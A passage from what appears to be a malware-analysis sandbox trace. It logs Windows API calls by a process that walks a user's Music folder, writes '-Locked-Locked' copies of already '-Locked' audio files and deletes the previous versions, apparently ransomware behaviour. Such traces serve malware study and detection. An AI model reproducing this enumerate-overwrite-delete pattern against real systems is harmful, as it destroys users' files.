(in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suzai", cAlternateFileName="")) returned 1 [0307.012] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cecbe5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cecbe5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cecbe5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YchaUe.m4a-Locked", cAlternateFileName="YCHAUE~1.M4A")) returned 1 [0307.012] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34e9e28b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34e9e28b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34e9e28b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yhytw0.m4a-Locked", cAlternateFileName="YHYTW0~1.M4A")) returned 1 [0307.013] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35067722, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35067722, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35067722, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZD9ZxqvIbPOBH.mp3-Locked", cAlternateFileName="ZD9ZXQ~2.MP3")) returned 1 [0307.013] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.013] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.014] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music", lpFilePart=0x0) returned 0x1b [0307.014] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpFilePart=0x0) returned 0x1c [0307.014] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3513d0c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3513d0c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.014] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3513d0c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3513d0c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.014] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cca839, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cca839, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cca839, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.015] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cd457f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cd457f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cd457f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FliceLJAYp8j0i3clDA.m4a-Locked", cAlternateFileName="FLICEL~2.M4A")) returned 1 [0307.015] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cdbabe, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cdbabe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cdbabe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hc-ff1Mym_xG 8y7.wav-Locked", cAlternateFileName="HC-FF1~2.WAV")) returned 1 [0307.015] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34ce5622, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34ce5622, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34ce5622, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZBiyuFJk P66leN.wav-Locked", cAlternateFileName="PZBIYU~2.WAV")) returned 1 [0307.015] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suzai", cAlternateFileName="")) returned 1 [0307.015] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cecbe5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cecbe5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cecbe5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YchaUe.m4a-Locked", cAlternateFileName="YCHAUE~1.M4A")) returned 1 [0307.016] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34e9e28b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34e9e28b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34e9e28b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yhytw0.m4a-Locked", cAlternateFileName="YHYTW0~1.M4A")) returned 1 [0307.016] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35067722, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35067722, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35067722, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZD9ZxqvIbPOBH.mp3-Locked", cAlternateFileName="ZD9ZXQ~2.MP3")) returned 1 [0307.016] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35067722, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35067722, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35067722, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZD9ZxqvIbPOBH.mp3-Locked", cAlternateFileName="ZD9ZXQ~2.MP3")) returned 0 [0307.016] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.017] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x35 [0307.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.017] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.017] GetFileType (hFile=0x49c) returned 0x1 [0307.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.017] GetFileType (hFile=0x49c) returned 0x1 [0307.019] CloseHandle (hObject=0x49c) returned 1 [0307.019] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2e [0307.019] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\desktop.ini-locked")) returned 1 [0307.020] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked-Locked", lpFilePart=0x0) returned 0x41 [0307.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.021] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\fliceljayp8j0i3clda.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.021] GetFileType (hFile=0x49c) returned 0x1 [0307.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.021] GetFileType (hFile=0x49c) returned 0x1 [0307.023] CloseHandle (hObject=0x49c) returned 1 [0307.023] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked", lpFilePart=0x0) returned 0x3a [0307.023] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\FliceLJAYp8j0i3clDA.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\fliceljayp8j0i3clda.m4a-locked")) returned 1 [0307.024] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked-Locked", lpFilePart=0x0) returned 0x3e [0307.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.024] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hc-ff1mym_xg 8y7.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.025] GetFileType (hFile=0x49c) returned 0x1 [0307.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.025] GetFileType (hFile=0x49c) returned 0x1 [0307.026] CloseHandle (hObject=0x49c) returned 1 [0307.027] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked", lpFilePart=0x0) returned 0x37 [0307.027] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Hc-ff1Mym_xG 8y7.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\hc-ff1mym_xg 8y7.wav-locked")) returned 1 [0307.028] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked-Locked", lpFilePart=0x0) returned 0x3e [0307.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.028] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pzbiyufjk p66len.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.028] GetFileType (hFile=0x49c) returned 0x1 [0307.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.028] GetFileType (hFile=0x49c) returned 0x1 [0307.030] CloseHandle (hObject=0x49c) returned 1 [0307.030] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked", lpFilePart=0x0) returned 0x37 [0307.030] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\PZBiyuFJk P66leN.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pzbiyufjk p66len.wav-locked")) returned 1 [0307.031] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked-Locked", lpFilePart=0x0) returned 0x34 [0307.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.031] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\ychaue.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.031] GetFileType (hFile=0x49c) returned 0x1 [0307.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.031] GetFileType (hFile=0x49c) returned 0x1 [0307.033] CloseHandle (hObject=0x49c) returned 1 [0307.033] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked", lpFilePart=0x0) returned 0x2d [0307.033] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\YchaUe.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\ychaue.m4a-locked")) returned 1 [0307.034] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked-Locked", lpFilePart=0x0) returned 0x34 [0307.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.034] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\yhytw0.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.034] GetFileType (hFile=0x49c) returned 0x1 [0307.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.034] GetFileType (hFile=0x49c) returned 0x1 [0307.036] CloseHandle (hObject=0x49c) returned 1 [0307.036] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked", lpFilePart=0x0) returned 0x2d [0307.036] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Yhytw0.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\yhytw0.m4a-locked")) returned 1 [0307.037] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked-Locked", lpFilePart=0x0) returned 0x3b [0307.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.037] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\zd9zxqvibpobh.mp3-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.037] GetFileType (hFile=0x49c) returned 0x1 [0307.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.037] GetFileType (hFile=0x49c) returned 0x1 [0307.038] CloseHandle (hObject=0x49c) returned 1 [0307.039] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked", lpFilePart=0x0) returned 0x34 [0307.039] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\ZD9ZxqvIbPOBH.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\zd9zxqvibpobh.mp3-locked")) returned 1 [0307.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.039] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", lpFilePart=0x0) returned 0x21 [0307.039] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", lpFilePart=0x0) returned 0x22 [0307.039] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351481e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351481e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351481e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzU_ 4bXy7iRPpZe1.mp3-Locked", cAlternateFileName="AZU_4B~2.MP3")) returned 1 [0307.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WyJ", cAlternateFileName="")) returned 1 [0307.040] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WyJ", cAlternateFileName="")) returned 0 [0307.040] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.041] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai", lpFilePart=0x0) returned 0x21 [0307.041] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\", lpFilePart=0x0) returned 0x22 [0307.041] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x35166990, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35166990, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.041] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: 